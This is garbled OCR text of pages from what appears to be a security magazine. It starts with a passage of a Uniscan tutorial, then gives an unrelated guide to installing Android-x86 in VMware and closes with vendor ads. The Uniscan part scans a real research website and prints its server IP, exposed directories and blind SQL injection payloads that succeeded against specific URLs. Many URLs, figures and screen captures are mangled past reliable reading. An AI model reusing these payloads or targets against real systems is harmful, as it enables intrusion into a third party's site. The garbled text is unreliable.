+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 



No result 



http ://www. fsl .prat .edu 
http : //www. all about birds .org 
http : //hydro . vwrrc .vt .edu 
http : //www. endnote .com 
http : //www. dart mouth .edu 
http ://www.geol .lu.se 
http : //www. syr.edu 
http : //www. campbell sci .com 
http ://hubbardbrook .org 
http : //www. hubbardb rook foundation .org 
http : //www. geology .neab .net 
http ://lvis .gsfc .nasa .gov 
http ://www.mic roscopy-uk .org . uk 
http : //www. bio . umass .edu 
http : //www. uvm .edu 





Figure 9. Timthumb and external hosts 

Step 7. 

PHPinfo () Disclosure and Web Backdoors (Figure 10). 



| PHPinfo() Disclosure: 
I 

| Web Backdoors: 
I 

| Ignored Files: 

I http : //www. hubbardb rook . o rg/gis/metadata/1 1 l_gis_peaks_eml .xml 

I http : //www. hubbardb rook . o rg/gis/metadata/91_gis_contusgs_eml .xml 

I http : //www. hubbardb rook .org/6-12_education/TeacherActivities/TeachHdout/H03 .do 

c 

| http : //www. hubbardb rook .org/eml/5_knb-lter-hbr.5 .6 .xml 

I http://www.-hubbardbrook.Org/enil/35_knb-ltef-hbr.35.6.sciTil 

I http : //www. hubbardb rook .org/gis/metadata/94_gis_wsheds_eml .xml 

I http : //www. hubbardb rook . o rg/gis/metadata/1 14_gis_wmnf_eml .xml 

I http ://www. hubbardb rook . o rg/gis/metadata/99_gis_hb30mdem_eml .xml 

I http ://w»\(w. hubbardb rook .org/people/images/ . . 

I http : //www. hubbardb rook . o rg/eml/81_animals_-_bi rd_abundance_data .xml 

I http : //www. hubbardb rook .org/gis/rnetadata/98_gis_hbl0mdem_eml .xml 

I http : //www. hubbardb rook .org/eml/14_atmospheric_inputs_-_precipitation_by_water 
shed .xml 



Figure 10. PHPinfo () Disclosure and Web Backdoors 

Step 8. 

Dynamic test plugin names and FCKeditor tests (Figure 11). 
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Dynamic tests; 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
Plugin 
[ + ] 0 



Learning New Directories v. 1.2 Loaded. 
FCKedior tests v. 1.1 Loaded. 
Timthumb <= 1.32 vulnerability v.l Loaded 
Find Backup Files v. 1.2 Loaded. 
Blind SQL-injection tests v. 1.3 Loaded. 
Local File Include tests v. 1.1 Loaded. 
PHP CGI Argument Injection v. 1.1 Loaded. 
Remote Command Execution tests v. 1.1 Loaded 
Remote File Include tests v. 1.2 Loaded. 
SQL-injection tests v. 1.2 Loaded. 
Cross-Site Scripting tests v. 1.2 Loaded. 
Web Shell Finder v. 1.3 Loaded. 



name : 
name : 
name : 
name : 
name : 
name : 
name : 
name : 
name : 
name : 
name : 
name : 

New directories added 



FCKeditor tests: 




No result 



Figure 11. Dynamic test plugin names and FCKeditor tests 

Step 9. 

Timthumb < 1.33 vulnerability, Backup Files and Blind SQL Injection vulnerability information (Figure 12). 




| Blind SQL Injection: 

| [ + ] Vul [Blind SQL-i] : http : //www. hubbardb rook .org/image_library/view.php?id=6 

l +AND+'l , ='l 

| [+] Keyword: Sensing 

| [+] Vul [Blind SQL-i]: http : //www. hubbardb rook . a rg/image_lib ra ry/view . php?id=l 

Q'+AND+'l'^l 

| [+] Keyword: Sensing 

[+] Vul [Blind SQL-i]: http : //www. hubbardb rook .org/image_libra ry/view. php?id=4 
l +AND+'l , ='l 

[+] Keyword: Sensing 



Figure 12. Timthumb < 1.33 vulnerability, Backup Files and Blind SQL Injection vulnerability information 



Step 1 0. 

Local File Include, PHP CGI Argument Injection, Remote Command Execution, Remote File Include, SQL 
Injection (Figure 13). 
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Figure 13. Local File Include, PHP CGI Argument Injection, Remote Command Execution, Remote File 
Include, SQL Injection 

Step 1 1 . 

Web Shell Finder, Static test plugin names, Local file Include, Remote Command Execution (Figure 14). 



Web Shell Finder: tftai No result 



Static tests: 

Plugin name: Local File Include tests v. 1.1 Loaded. 

Plugin name: Remote Command Execution tests v. 1.1 Loaded. 

Plugin name: Remote File Include tests v. 1.1 Loaded. 




Figure 14. Web Shell Finder, Static test plugin names, Local file Include, Remote Command Execution 



Step 1 2. 

Remote File Include (Figure 15). 



Remote File Include: 



No result 



Scan end date: 2-12-2613 6:51:45 



HTML report saved in: repo rt/www . hubba rdb rook . o rg . html 

root(jiM r Quie t y : ~# | 
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Figure 15. Remote File Include 



Step 13. 



Here we are starting Uniscan-gui. First of all, write your target URL in the URL field. Then, select the box 
from Uniscan Options. It depends on which type of scan and which plugin do you want to apply. Then, click 
start scan and wait for the scan to finish. After completing, you have to click Open log file. There you can 
see your scan result (Figure 16). 

URL: jwww.liLibbardbrook.orgl — 

Uniscan Options: ■ Check Directory Check Fifes Check .'robots.txt Dynamic tests 
Static tests Stress tests Wj^bFingerprint Server Fingerprint 
Start loan Opentogfile 



tscan Open loq tile 



1. write Url 
which one do 
you want to scan 



3. click here for 
starting scan 



4. open log file 
will show you 
your all scan 
results 



2. click which 
type of 

test/plugins do 
you want to scan 



Figure 16. Scanning options 



Step 1 4. 



Open log file. Here, you can see your scan result (Figure 17). 



#################################### 

# Uniscan project # 

# http://uniscan.sourceforge.net/ # 
#################################### 
V. 6,2 



Scan date: 1-12-2013 20:46:35 



Domain : http : //www . hubbardbrocfc . org/ 
Server: Apache/2.2.16 <Debian) 
IP: 132.177.243.138 



Directory check; 

[ + ] CODE: 200 URL : http://wnw.hiibbardbrQok.org/eml/ 

[+] CODE: 200 URL: http://www.hubbardbrook.org/gis/ 

[+] CODE: 200 URL: http://www.hubbardbrook.org/icons/ 

[+] CODE: 200 URL: http://www.hubbardbrook.org/image_library/ 

[ + ] CODE: 200 URL: http://www.hubbardbrook.org/people/ 

[+] CODE: 200 URL : http://www.hubbardbrQok.crg/samples/ 




E"ile check : 

[+] CODE: 200 URL: http://www.hubbardbrook.org/server-statuE 

[+] CODE: 200 URL: http://www.hubbardbrook.org/favicon.ico 

[+] CODE: 200 URL: http://www.hubbardbrook.org/index.shtml 



Figure 17. Log file - scan results 
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How to Install Android 4.3 on VM 

by Rrajesh Kumar 

In my previous article I teached you how to install BackTrack 5 on Virtual Machine. This 
time you will deal with Android 4.3. You will need just Android-x86-4.3.ISO and any Virtual 
Machine Software. 

Requirements 

• Android-x86-4.3.ISO 

• Any Virtual Machine Software (recommended VM player & VM workstation) 

Step 1 . 

Go to File and click on New Virtual Machine (Figure 1). 





File | tdrt View VM labs; Help 




fl IM<-w Virtual Machine. . CtrUN 


% 1 o 


fS] New Window 

Open... l_tn>U 




Close Tab Ctrl*V/ 




Connectto Server... Cfrl^L 
Virtuali7p a Phytic - *! MsrhirTP... 


'are* Workstation 9 


Export to OVF... 
£ Map Virtual Disks... 




Exrl 





T 



Figure 1. Creating a new virtual machine 



Step 2. 



Select Typical and click Next (Figure 2). 



New VirTLisI h/achine Wiza'd 




VMware' 

Workstation 9 



Help 



Welcome to the New Virtual 
Machine Wizard 



What type of configuration do you want? 

Typical (recommended) 

Create a Workstation 9.0 virtual machine 
in a few easy steps. 

■ Custom (advanced) 

Create a virtual machine with advanced 
options, such as a SCSI controller type, 
virtual disk type and compatibility with 
older VHware products. 



Cancel 



Figure 2. Choosing the type of configuration 
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Step 3. 



Select the ISO file and click Next (Figure 3). 

N e w Vi r.u 3 1 W ach i ne W iza 'd [. 



Guest Operating System Installation 

A virtual machine is like a physical computer ; it needs an operating 
system. How will you install the guest operating system? 



Install from; 
© Installer disc; 



$ DVD RW Drive (G;) Games 




click on browse & select 1 




Android I So | 



■*' Installer disc image file Jiso) 



D : Android -x86-4. 3-20 130725. iso 

^ Cannot read this file. 

Specify a different file or select a different option to continue. 

'*_> I will install the operating system later. 

The virtual machine will be created with a blank hard disk . 



Help 



< Back Cancel 



Figure 3. Selecting the ISO file 

Step 4. 

You can rename your OS and also you can choose where do you want to install it (Figure 4). 



New Virus I fv'achine Wiza'd 



N a m e th e Virtu a I H a ch in e 

What name would you like to use for this virtual machine? 



Virtual machine 



Android 4, 3 



Location; 



J- 

e narngj^^ 



ename it or leave it as default 



C; IJUsers'iMusthiaib '(Documents '(Virtual Machines '(Android 4.3 
The default location can be changed at Edit > Preferences, 



you can change your location 
means you can choose where you 
want to save your OS 



< Back Next > Cancel 



Figure 4. Choosing the installation path 
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Step 5. 

Change your OS installation disk size (it should be more than 2 GB) for comfort and click Next (Figure 5). 

N evv Vi rrLial N' ach i ne W i;a -d 



Specify Disk Capacity 

How large do you want this disk to be ? 



The virtual machine's hard disk is stored as one or more files on the host 
computer's physical disk, These filejs) start small and become larger as you 
add applications, files, and data to your virtual machine. 



Maximum disk size (GB) : 20. Q j=tj, 

Recommended size for FreeBSD: 20 GB 

_• Store virtual disk as a single file 
© Split virtual disk into multiple files 



Resize your disk. It 
should be atlest 2 GB 
or more then 2 GB : it 
will be good for playing 
more stuff 



Splitting the disk makes it easier to move the virtual machine to another 
computer but may reduce performance with very large disks. 



Help 



< Back Next > Cancel 



Figure 5. Changing your disk size 

Step 6. 

Click on Finish (Figure 6). 



New Virus I r/achine Wiza-d 



Ready to Create Virtual Machine 

Click Finish to create the virtual machine and start installing FreeBSD. 



The virtual machine will be created with the following settings: 



Name: 


Android 4,3 




Location: 


C :\U sers\M usthiai b\ D o c u m entsWi rtual M a c h i n es\A 




V ei : i c n : 


Workstation 9,0 




Operating Sy:t. 


, FreeBSD 




Hard Disk: 


20 GB.. Split 




M em c ry: 


256 MB 






nr | ► 




* c 





Customize Hardware. 



you can customize hardware 
here like choose RAM of 1GB 



F71 Power on this virtual machine after creanoff 



< Back 



Finish 



Cancel 



Figure 6. Finishing creating the VM 
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Step 7. 



After booting your ISO, the screen similar to Figure 7 will show. Select Installation (Figure 7). 



I j GEren li Ban J m [Paj HBH I raj EBB fcBBal 



Li'JEi CD - jiLLJj flfidTLli rl-Jirjrj WibljEjLLS: IfjL-fcuiiLL-hiDfJ 
Li'JEi CD - IJJi'^J JUEjrlEi 

LIues CD - DEiijLL!r jucjlL==! 



Installation - Install Android-x86 to harddisk 



.^I'Eiii I'i'iLLiJ X Li Eidl'E DU't IDSl 




id-x86.o 




Figure 7. Starting the installation of the OS 

Step 8. 

Select Create/Modify partitions and click OK (Figure 8). 





Figure 8. Creating or modifying partitions 
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Step 9. 

Select New (Figure 9). 



cfdisk Cut i 1- 1 inux-ng 2.14.1) 

Disk Drive: /dev/sda 
Size: 21474836480 bytes, 21.4 GD 
Heads: 255 Sectors per Track: 83 Cylinders: 2610 

Flags Part Type FS Type [Label] 



Pri/Log Free Space 



Size (MD) 



21467.99 



[ Help 1 
[ write 1 



1 [ Units 



Create new partition fron free space_ 



Figure 9. Creating a new partition 

Step 1 0. 

Select Primary (Figure 10). 



cfdisk (utll-linux ng 7.14.1) 

Disk Drive: 'dev/sria 
Sfze: 85B9934597 bytes, B589 MB 
Heads: 255 Sectors per Track: 63 Cylinders: 1B4.4 



Part Type FS Type 



Pri^Loa Frso Spa la 



ILabel 1 



SUe (MB) 



B587. 28 



II J Jl! 1 ! J ill |[i>.n. all lc.i I I 



• 11 I 



raate a nau primary partition. 



Figure 10. Creating a primary partition 



55 



Kali Linux 



Step 1 1 . 



Let it be default and press Enter (Figure 11). 



cfdisk tut i 1-1 inux-ng 2.14.1) 

Disk Drive: /dev/sda 
Size: 21474836480 bytes, 21.4 GB 
Heads: 255 Sectors per Track: 63 Cylinders : 2610 

Flags Part Type FS Type [Label] 



Pri/Log Free Space 



Size (MD) 



21467.99 




Figure 11. Default settings 



Step 1 2. 

Now select Write and press Enter (Figure 12). 



cfdisk Cut i 1- 1 i ii u x— rig 2.14.13 

H isk Hr : /flRu/srin 
Size: 21474030400 bytes, 21.4 GB 
Heads: 255 Sectors per Track: 63 Cylinders: 2B1B 

Flags fart Type FS Type LLabeJJ 



slal 



PriMari) Linux 



21467. 9S 



L Bootable 1 L Ueiete J L Help 1 L MaxiMize ] L Print J 
[ Quit ] E Type ] [ Units 1 KI3X^K 

Urits partition table to disk (this Might destroy datfl)_ 



Figure 12. Selecting the Write option 



Step 13. 



Type Yes and press Enter (Figure 13). 
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fire you sure you want to write the partition table to disk? (yes or no): 
warning'! This May destroy data on your disk! 



Figure 13. Writing the partition table to disk 



Step 1 4. 

Select Quit and press Enter (Figure 14). 



[ Bootable ] [ Delete ] [ Help ] [ MaxiMize ] [ Print ] 
[^KQfg^H] t Type ] [ Units ] [ Urite ] 

Quit prograM without writing partition table_ 



Figure 14. Quitting the program without writing partition table 



Step 1 5. 



Select sdai and press Enter (Figure 15). 




Figure 15. Selecting sdal 



Step 1 6. 

Select ext3 and press Enter (Figure 16). 
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Choose filesysteM 
Please select a filesysten to fornat sdal: 



Do not fomat 



ext2 
nt f s 
fat32 




< OK > 



<Cance 1 > 



Figure 16. Selecting a filesystem to format sdal 



Step 1 7. 



Select Yes and press Enter (Figure 17). 




Figure 17. Confirming formatting 



Step 1 8. 



Select Yes and press Enter (Figure 18). 




Conf im 



Do you uant to install boot loader GRUB? 



Figure 18. Installing GRUB 
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Step 1 9. 



Select Yes and press Enter (Figure 19). 




Quest ion 

Do you Hant to install /systei-i directory as read-Hrite? 

Making /systeM be read-Hrite is easier for debugging, but 
it needs More disk space and longer installation tiMe. 



Figure 19. Installing /system directory as read-write 



Step 20. 



Select Run Android-x86 and press Enter (Figure 20). 




Congratulat ions! 
flndroid-x86 is installed successfully, 



Figure 20. Running Android -x86 



Step 21 . 



The booting has started (Figure 21). Be aware that it will take some time. 




Figure 21. Boot screen 
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Step 22. 

Select the language and click Start (Figure 22). 



Welcome 

tmjliifi lUmti-U Kmydurrij 

English (United Stated 




Ki trmtigtincy call 



Figure 22. Language choice screen 

Step 23. 

It takes some time to load (Figure 23). 



■ 

Welcome 



JllSl 3 WC 




Figure 23. Loading 



Step 24. 

You can select the available network or just click Skip (Figure 24). 



Select Wi-Fi 



-|- Oih« rmwort; . 




Figure 24. Choosing the network 
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Step 25. 

Select Yes to setup your Account or No to set it up later (Figure 25). 



■ 

Got Google? 

Do you hove a Googte Aocounp 

I f you u*r Gmail nr GonglF Apps,answ«V« 




Figure 25. Setting up your Google account 

Step 26. 



Set the time and date. Then, click on the arrow (Figure 26). 



i 

Date & time 








4 


Cur ren! dale 




Current time 


• 




1 cHck urn 




\ 







Figure 26. Setting date and time 



Step 27. 

Provide the username and click on the arrow (Figure 27). 
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This tablet belongs to... 

The lahlet usee your name 10 perMnalize some apps 
Muslims 


1 

< 


Click Here 





Figure 27. Providing the username 



Step 28. 



The desktop screen will appear (Figure 28). 




Figure 28. Desktop screen 



Step 29. 

You can take a look at the default applications (Figure 29). 



62 



Kali Linux 



I 

APR WBQET3 Q 1HQP 


f 


H 

+ 


■ 


T- 0 


* 


<*> 


i 

■Hi 




■Ml 


.\ 


R 

Mmj 


P 

MMM|MJ 




A 

N»»4Kim 


■ 




a 


« 


■hhh 




□ 

TtimiruJ Em 


r i 










■ 









Figure 29. Default applications 



Step 30. 



You can check your Android version in Settings — > About tablet (Figure 30). 







1 11M 








NJM0HH 


Sy tTim updait-K 




■d^ Location kchi 

0 Lavage & input 


Status 

in ku» of Ida i. Btrat, Ml rtdm MM 




Legal information 




<D Backup & r«#i 
aqcminti 


Mmudclufer 
Hg|ll 




+ Add KCOunl 






w*vm 


Android veruan 




•3 Unit turn* 






fjt Accessibility 


Baseband rer&ion 




Q Aboul table) 


Kpmgl v«f3ion 




0 PcwwCrff 


1 MMMJfcl cm^^n^ iiu<> »i 
IMril l»MQ?CST Mil 

OpinGL dfwH vfrrSinn 






<-z3 t^i [3 





Figure 30. Checking your Android version 



63 



A N R C 




A Cyber criminal can target and breach 
your organization's perimeter in less than 
a second from anywhere in the world ... 

Are You Prepared? 

ANRC delivers advanced cyber security training, consulting, and development services 
that provide our customers with peace of mind in an often confusing cyber security environment. 
ANRC's advanced security training program utilizes an intensive hands-on laboratory method 
of training taught by subject matter experts to provide Information Security professionals with 
the knowledge and skills necessary to defend against today's cyber-attacks and tomorrow's 
emerging threats. 

ANRC's consulting and development services leverage team member knowledge and experience 
gained in the trenches while securing critical networks in the U.S. Department of Defense and 
large U.S. corporations. ANRC tailors these services to deliver computer security solutions specific 
to the needs of the customer's operational environment. Our approach emphasizes a close relationship 
with our clients as an integral part of our service. We believe we're all in the security battle together, 
and we view our customers as key members of our team in the fight. 



TRAINING :: CONSULTING :: SOLUTIONS w.anrc-services.com 
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Titania's award winning Nipper Studio configuration 
auditing tool is helping security consultants and end- 
user organizations worldwide improve their network 
security. Its reports are more detailed than those typically 
produced by scanners, enabling you to maintain a higher 
level of vulnerability analysis in the intervals between 
penetration tests. 

Now used in over 45 countries, Nipper Studio provides a 
thorough, fast & cost effective way to securely audit over 
100 different types of network device. The NSA, FBI, DoD 
& U.S. Treasury already use it, so why not try it for free at 
www.titania.com 
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Enterprise Security 
Solution of the Year 



WINNER 

Network Security 
Solution of the Year 



www.titania.com 



